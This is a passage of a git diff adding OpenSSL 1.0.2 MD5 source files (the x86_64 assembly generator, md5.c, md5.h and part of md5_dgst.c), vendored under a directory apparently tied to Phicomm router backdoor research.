+# Each round2_step() takes about 5.4 clocks (11 instructions, 2.0 IPC)
+sub round2_step
+{
+    my ($pos, $dst, $x, $y, $z, $k_next, $T_i, $s) = @_;
+    $code .= " mov	1*4(%rsi),	%r10d		/* (NEXT STEP) X[1] */\n" if ($pos == -1);
+    $code .= " mov	%edx,		%r11d		/* (NEXT STEP) z' = %edx */\n" if ($pos == -1);
+    $code .= " mov	%edx,		%r12d		/* (NEXT STEP) z' = %edx */\n" if ($pos == -1);
+    $code .= <<EOF;
+	not	%r11d				/* not z */
+	lea	$T_i($dst,%r10d),$dst		/* Const + dst + ... */
+	and	$x,		%r12d		/* x & z */
+	and	$y,		%r11d		/* y & (not z) */
+	mov	$k_next*4(%rsi),%r10d		/* (NEXT STEP) X[$k_next] */
+	or	%r11d,		%r12d		/* (y & (not z)) | (x & z) */
+	mov	$y,		%r11d		/* (NEXT STEP) z' = $y */
+	add	%r12d,		$dst		/* dst += ... */
+	mov	$y,		%r12d		/* (NEXT STEP) z' = $y */
+	rol	\$$s,		$dst		/* dst <<< s */
+	add	$x,		$dst		/* dst += x */
+EOF
+}
+
+# round3_step() does:
+#   dst = x + ((dst + H(x,y,z) + X[k] + T_i) <<< s)
+#   %r10d = X[k_next]
+#   %r11d = y' (copy of y for the next step)
+# Each round3_step() takes about 4.2 clocks (8 instructions, 1.9 IPC)
+sub round3_step
+{
+    my ($pos, $dst, $x, $y, $z, $k_next, $T_i, $s) = @_;
+    $code .= " mov	5*4(%rsi),	%r10d		/* (NEXT STEP) X[5] */\n" if ($pos == -1);
+    $code .= " mov	%ecx,		%r11d		/* (NEXT STEP) y' = %ecx */\n" if ($pos == -1);
+    $code .= <<EOF;
+	lea	$T_i($dst,%r10d),$dst		/* Const + dst + ... */
+	mov	$k_next*4(%rsi),%r10d		/* (NEXT STEP) X[$k_next] */
+	xor	$z,		%r11d		/* z ^ ... */
+	xor	$x,		%r11d		/* x ^ ... */
+	add	%r11d,		$dst		/* dst += ... */
+	rol	\$$s,		$dst		/* dst <<< s */
+	mov	$x,		%r11d		/* (NEXT STEP) y' = $x */
+	add	$x,		$dst		/* dst += x */
+EOF
+}
+
+# round4_step() does:
+#   dst = x + ((dst + I(x,y,z) + X[k] + T_i) <<< s)
+#   %r10d = X[k_next]
+#   %r11d = not z' (copy of not z for the next step)
+# Each round4_step() takes about 5.2 clocks (9 instructions, 1.7 IPC)
+sub round4_step
+{
+    my ($pos, $dst, $x, $y, $z, $k_next, $T_i, $s) = @_;
+    $code .= " mov	0*4(%rsi),	%r10d		/* (NEXT STEP) X[0] */\n" if ($pos == -1);
+    $code .= " mov	\$0xffffffff,	%r11d\n" if ($pos == -1);
+    $code .= " xor	%edx,		%r11d		/* (NEXT STEP) not z' = not %edx*/\n"
+    if ($pos == -1);
+    $code .= <<EOF;
+	lea	$T_i($dst,%r10d),$dst		/* Const + dst + ... */
+	or	$x,		%r11d		/* x | ... */
+	xor	$y,		%r11d		/* y ^ ... */
+	add	%r11d,		$dst		/* dst += ... */
+	mov	$k_next*4(%rsi),%r10d		/* (NEXT STEP) X[$k_next] */
+	mov	\$0xffffffff,	%r11d
+	rol	\$$s,		$dst		/* dst <<< s */
+	xor	$y,		%r11d		/* (NEXT STEP) not z' = not $y */
+	add	$x,		$dst		/* dst += x */
+EOF
+}
+
+no warnings qw(uninitialized);
+my $flavour = shift;
+my $output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+my $win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; my $dir=$1; my $xlate;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+$code .= <<EOF;
+.text
+.align 16
+
+.globl md5_block_asm_data_order
+.type md5_block_asm_data_order,\@function,3
+md5_block_asm_data_order:
+	push	%rbp
+	push	%rbx
+	push	%r12
+	push	%r14
+	push	%r15
+.Lprologue:
+
+	# rdi = arg #1 (ctx, MD5_CTX pointer)
+	# rsi = arg #2 (ptr, data pointer)
+	# rdx = arg #3 (nbr, number of 16-word blocks to process)
+	mov	%rdi,		%rbp	# rbp = ctx
+	shl	\$6,		%rdx	# rdx = nbr in bytes
+	lea	(%rsi,%rdx),	%rdi	# rdi = end
+	mov	0*4(%rbp),	%eax	# eax = ctx->A
+	mov	1*4(%rbp),	%ebx	# ebx = ctx->B
+	mov	2*4(%rbp),	%ecx	# ecx = ctx->C
+	mov	3*4(%rbp),	%edx	# edx = ctx->D
+	# end is 'rdi'
+	# ptr is 'rsi'
+	# A is 'eax'
+	# B is 'ebx'
+	# C is 'ecx'
+	# D is 'edx'
+
+	cmp	%rdi,		%rsi		# cmp end with ptr
+	je	.Lend				# jmp if ptr == end
+
+	# BEGIN of loop over 16-word blocks
+.Lloop:	# save old values of A, B, C, D
+	mov	%eax,		%r8d
+	mov	%ebx,		%r9d
+	mov	%ecx,		%r14d
+	mov	%edx,		%r15d
+EOF
+round1_step(-1,'%eax','%ebx','%ecx','%edx', '1','0xd76aa478', '7');
+round1_step( 0,'%edx','%eax','%ebx','%ecx', '2','0xe8c7b756','12');
+round1_step( 0,'%ecx','%edx','%eax','%ebx', '3','0x242070db','17');
+round1_step( 0,'%ebx','%ecx','%edx','%eax', '4','0xc1bdceee','22');
+round1_step( 0,'%eax','%ebx','%ecx','%edx', '5','0xf57c0faf', '7');
+round1_step( 0,'%edx','%eax','%ebx','%ecx', '6','0x4787c62a','12');
+round1_step( 0,'%ecx','%edx','%eax','%ebx', '7','0xa8304613','17');
+round1_step( 0,'%ebx','%ecx','%edx','%eax', '8','0xfd469501','22');
+round1_step( 0,'%eax','%ebx','%ecx','%edx', '9','0x698098d8', '7');
+round1_step( 0,'%edx','%eax','%ebx','%ecx','10','0x8b44f7af','12');
+round1_step( 0,'%ecx','%edx','%eax','%ebx','11','0xffff5bb1','17');
+round1_step( 0,'%ebx','%ecx','%edx','%eax','12','0x895cd7be','22');
+round1_step( 0,'%eax','%ebx','%ecx','%edx','13','0x6b901122', '7');
+round1_step( 0,'%edx','%eax','%ebx','%ecx','14','0xfd987193','12');
+round1_step( 0,'%ecx','%edx','%eax','%ebx','15','0xa679438e','17');
+round1_step( 1,'%ebx','%ecx','%edx','%eax', '0','0x49b40821','22');
+
+round2_step(-1,'%eax','%ebx','%ecx','%edx', '6','0xf61e2562', '5');
+round2_step( 0,'%edx','%eax','%ebx','%ecx','11','0xc040b340', '9');
+round2_step( 0,'%ecx','%edx','%eax','%ebx', '0','0x265e5a51','14');
+round2_step( 0,'%ebx','%ecx','%edx','%eax', '5','0xe9b6c7aa','20');
+round2_step( 0,'%eax','%ebx','%ecx','%edx','10','0xd62f105d', '5');
+round2_step( 0,'%edx','%eax','%ebx','%ecx','15', '0x2441453', '9');
+round2_step( 0,'%ecx','%edx','%eax','%ebx', '4','0xd8a1e681','14');
+round2_step( 0,'%ebx','%ecx','%edx','%eax', '9','0xe7d3fbc8','20');
+round2_step( 0,'%eax','%ebx','%ecx','%edx','14','0x21e1cde6', '5');
+round2_step( 0,'%edx','%eax','%ebx','%ecx', '3','0xc33707d6', '9');
+round2_step( 0,'%ecx','%edx','%eax','%ebx', '8','0xf4d50d87','14');
+round2_step( 0,'%ebx','%ecx','%edx','%eax','13','0x455a14ed','20');
+round2_step( 0,'%eax','%ebx','%ecx','%edx', '2','0xa9e3e905', '5');
+round2_step( 0,'%edx','%eax','%ebx','%ecx', '7','0xfcefa3f8', '9');
+round2_step( 0,'%ecx','%edx','%eax','%ebx','12','0x676f02d9','14');
+round2_step( 1,'%ebx','%ecx','%edx','%eax', '0','0x8d2a4c8a','20');
+
+round3_step(-1,'%eax','%ebx','%ecx','%edx', '8','0xfffa3942', '4');
+round3_step( 0,'%edx','%eax','%ebx','%ecx','11','0x8771f681','11');
+round3_step( 0,'%ecx','%edx','%eax','%ebx','14','0x6d9d6122','16');
+round3_step( 0,'%ebx','%ecx','%edx','%eax', '1','0xfde5380c','23');
+round3_step( 0,'%eax','%ebx','%ecx','%edx', '4','0xa4beea44', '4');
+round3_step( 0,'%edx','%eax','%ebx','%ecx', '7','0x4bdecfa9','11');
+round3_step( 0,'%ecx','%edx','%eax','%ebx','10','0xf6bb4b60','16');
+round3_step( 0,'%ebx','%ecx','%edx','%eax','13','0xbebfbc70','23');
+round3_step( 0,'%eax','%ebx','%ecx','%edx', '0','0x289b7ec6', '4');
+round3_step( 0,'%edx','%eax','%ebx','%ecx', '3','0xeaa127fa','11');
+round3_step( 0,'%ecx','%edx','%eax','%ebx', '6','0xd4ef3085','16');
+round3_step( 0,'%ebx','%ecx','%edx','%eax', '9', '0x4881d05','23');
+round3_step( 0,'%eax','%ebx','%ecx','%edx','12','0xd9d4d039', '4');
+round3_step( 0,'%edx','%eax','%ebx','%ecx','15','0xe6db99e5','11');
+round3_step( 0,'%ecx','%edx','%eax','%ebx', '2','0x1fa27cf8','16');
+round3_step( 1,'%ebx','%ecx','%edx','%eax', '0','0xc4ac5665','23');
+
+round4_step(-1,'%eax','%ebx','%ecx','%edx', '7','0xf4292244', '6');
+round4_step( 0,'%edx','%eax','%ebx','%ecx','14','0x432aff97','10');
+round4_step( 0,'%ecx','%edx','%eax','%ebx', '5','0xab9423a7','15');
+round4_step( 0,'%ebx','%ecx','%edx','%eax','12','0xfc93a039','21');
+round4_step( 0,'%eax','%ebx','%ecx','%edx', '3','0x655b59c3', '6');
+round4_step( 0,'%edx','%eax','%ebx','%ecx','10','0x8f0ccc92','10');
+round4_step( 0,'%ecx','%edx','%eax','%ebx', '1','0xffeff47d','15');
+round4_step( 0,'%ebx','%ecx','%edx','%eax', '8','0x85845dd1','21');
+round4_step( 0,'%eax','%ebx','%ecx','%edx','15','0x6fa87e4f', '6');
+round4_step( 0,'%edx','%eax','%ebx','%ecx', '6','0xfe2ce6e0','10');
+round4_step( 0,'%ecx','%edx','%eax','%ebx','13','0xa3014314','15');
+round4_step( 0,'%ebx','%ecx','%edx','%eax', '4','0x4e0811a1','21');
+round4_step( 0,'%eax','%ebx','%ecx','%edx','11','0xf7537e82', '6');
+round4_step( 0,'%edx','%eax','%ebx','%ecx', '2','0xbd3af235','10');
+round4_step( 0,'%ecx','%edx','%eax','%ebx', '9','0x2ad7d2bb','15');
+round4_step( 1,'%ebx','%ecx','%edx','%eax', '0','0xeb86d391','21');
+$code .= <<EOF;
+	# add old values of A, B, C, D
+	add	%r8d,	%eax
+	add	%r9d,	%ebx
+	add	%r14d,	%ecx
+	add	%r15d,	%edx
+
+	# loop control
+	add	\$64,		%rsi		# ptr += 64
+	cmp	%rdi,		%rsi		# cmp end with ptr
+	jb	.Lloop				# jmp if ptr < end
+	# END of loop over 16-word blocks
+
+.Lend:
+	mov	%eax,		0*4(%rbp)	# ctx->A = A
+	mov	%ebx,		1*4(%rbp)	# ctx->B = B
+	mov	%ecx,		2*4(%rbp)	# ctx->C = C
+	mov	%edx,		3*4(%rbp)	# ctx->D = D
+
+	mov	(%rsp),%r15
+	mov	8(%rsp),%r14
+	mov	16(%rsp),%r12
+	mov	24(%rsp),%rbx
+	mov	32(%rsp),%rbp
+	add	\$40,%rsp
+.Lepilogue:
+	ret
+.size md5_block_asm_data_order,.-md5_block_asm_data_order
+EOF
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+my $rec="%rcx";
+my $frame="%rdx";
+my $context="%r8";
+my $disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	lea	.Lprologue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lprologue
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	lea	.Lepilogue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip>=.Lepilogue
+	jae	.Lin_prologue
+
+	lea	40(%rax),%rax
+
+	mov	-8(%rax),%rbp
+	mov	-16(%rax),%rbx
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r14
+	mov	-40(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	se_handler,.-se_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_md5_block_asm_data_order
+	.rva	.LSEH_end_md5_block_asm_data_order
+	.rva	.LSEH_info_md5_block_asm_data_order
+
+.section	.xdata
+.align	8
+.LSEH_info_md5_block_asm_data_order:
+	.byte	9,0,0,0
+	.rva	se_handler
+___
+}
+
+print $code;
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5.c
new file mode 100644
index 0000000..f0282c5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5.c
@@ -0,0 +1,121 @@
+/* crypto/md5/md5.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/md5.h>
+
+#define BUFSIZE 1024*16
+
+void do_fp(FILE *f);
+void pt(unsigned char *md);
+#if !defined(_OSD_POSIX) && !defined(__DJGPP__)
+int read(int, void *, unsigned int);
+#endif
+
+int main(int argc, char **argv)
+{
+    int i, err = 0;
+    FILE *IN;
+
+    if (argc == 1) {
+        do_fp(stdin);
+    } else {
+        for (i = 1; i < argc; i++) {
+            IN = fopen(argv[i], "r");
+            if (IN == NULL) {
+                perror(argv[i]);
+                err++;
+                continue;
+            }
+            printf("MD5(%s)= ", argv[i]);
+            do_fp(IN);
+            fclose(IN);
+        }
+    }
+    exit(err);
+}
+
+void do_fp(FILE *f)
+{
+    MD5_CTX c;
+    unsigned char md[MD5_DIGEST_LENGTH];
+    int fd;
+    int i;
+    static unsigned char buf[BUFSIZE];
+
+    fd = fileno(f);
+    MD5_Init(&c);
+    for (;;) {
+        i = read(fd, buf, BUFSIZE);
+        if (i <= 0)
+            break;
+        MD5_Update(&c, buf, (unsigned long)i);
+    }
+    MD5_Final(&(md[0]), &c);
+    pt(md);
+}
+
+void pt(unsigned char *md)
+{
+    int i;
+
+    for (i = 0; i < MD5_DIGEST_LENGTH; i++)
+        printf("%02x", md[i]);
+    printf("\n");
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5.h
new file mode 100644
index 0000000..2659038
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5.h
@@ -0,0 +1,119 @@
+/* crypto/md5/md5.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_MD5_H
+# define HEADER_MD5_H
+
+# include <openssl/e_os2.h>
+# include <stddef.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifdef OPENSSL_NO_MD5
+#  error MD5 is disabled.
+# endif
+
+/*
+ * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+ * ! MD5_LONG has to be at least 32 bits wide. If it's wider, then !
+ * ! MD5_LONG_LOG2 has to be defined along.                        !
+ * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+ */
+
+# if defined(__LP32__)
+#  define MD5_LONG unsigned long
+# elif defined(OPENSSL_SYS_CRAY) || defined(__ILP64__)
+#  define MD5_LONG unsigned long
+#  define MD5_LONG_LOG2 3
+/*
+ * _CRAY note. I could declare short, but I have no idea what impact
+ * does it have on performance on none-T3E machines. I could declare
+ * int, but at least on C90 sizeof(int) can be chosen at compile time.
+ * So I've chosen long...
+ *                                      <appro@fy.chalmers.se>
+ */
+# else
+#  define MD5_LONG unsigned int
+# endif
+
+# define MD5_CBLOCK      64
+# define MD5_LBLOCK      (MD5_CBLOCK/4)
+# define MD5_DIGEST_LENGTH 16
+
+typedef struct MD5state_st {
+    MD5_LONG A, B, C, D;
+    MD5_LONG Nl, Nh;
+    MD5_LONG data[MD5_LBLOCK];
+    unsigned int num;
+} MD5_CTX;
+
+# ifdef OPENSSL_FIPS
+int private_MD5_Init(MD5_CTX *c);
+# endif
+int MD5_Init(MD5_CTX *c);
+int MD5_Update(MD5_CTX *c, const void *data, size_t len);
+int MD5_Final(unsigned char *md, MD5_CTX *c);
+unsigned char *MD5(const unsigned char *d, size_t n, unsigned char *md);
+void MD5_Transform(MD5_CTX *c, const unsigned char *b);
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_dgst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_dgst.c
new file mode 100644
index 0000000..2b51946
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_dgst.c
@@ -0,0 +1,216 @@
+/* crypto/md5/md5_dgst.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "md5_locl.h"
+#include <openssl/opensslv.h>
+#include <openssl/crypto.h>
+
+const char MD5_version[] = "MD5" OPENSSL_VERSION_PTEXT;
+
+/*
+ * Implemented from RFC1321 The MD5 Message-Digest Algorithm
+ */
+
+#define INIT_DATA_A (unsigned long)0x67452301L
+#define INIT_DATA_B (unsigned long)0xefcdab89L
+#define INIT_DATA_C (unsigned long)0x98badcfeL
+#define INIT_DATA_D (unsigned long)0x10325476L
+
+fips_md_init(MD5)
+{
+    memset(c, 0, sizeof(*c));
+    c->A = INIT_DATA_A;
+    c->B = INIT_DATA_B;
+    c->C = INIT_DATA_C;
+    c->D = INIT_DATA_D;
+    return 1;
+}
+
+#ifndef md5_block_data_order
+# ifdef X
+#  undef X
+# endif
+void md5_block_data_order(MD5_CTX *c, const void *data_, size_t num)
+{
+    const unsigned char *data = data_;
+    register unsigned MD32_REG_T A, B, C, D, l;
+# ifndef MD32_XARRAY
+    /* See comment in crypto/sha/sha_locl.h for details. */
+    unsigned MD32_REG_T XX0, XX1, XX2, XX3, XX4, XX5, XX6, XX7,
+        XX8, XX9, XX10, XX11, XX12, XX13, XX14, XX15;
+#  define X(i)   XX##i
+# else
+    MD5_LONG XX[MD5_LBLOCK];
+#  define X(i)   XX[i]
+# endif
+
+    A = c->A;
+    B = c->B;
+    C = c->C;
+    D = c->D;
+
+    for (; num--;) {
+        HOST_c2l(data, l);
+        X(0) = l;
+        HOST_c2l(data, l);
+        X(1) = l;
+        /* Round 0 */
+        R0(A, B, C, D, X(0), 7, 0xd76aa478L);
+        HOST_c2l(data, l);
+        X(2) = l;
+        R0(D, A, B, C, X(1), 12, 0xe8c7b756L);
+        HOST_c2l(data, l);
+        X(3) = l;
+        R0(C, D, A, B, X(2), 17, 0x242070dbL);
+        HOST_c2l(data, l);
+        X(4) = l;
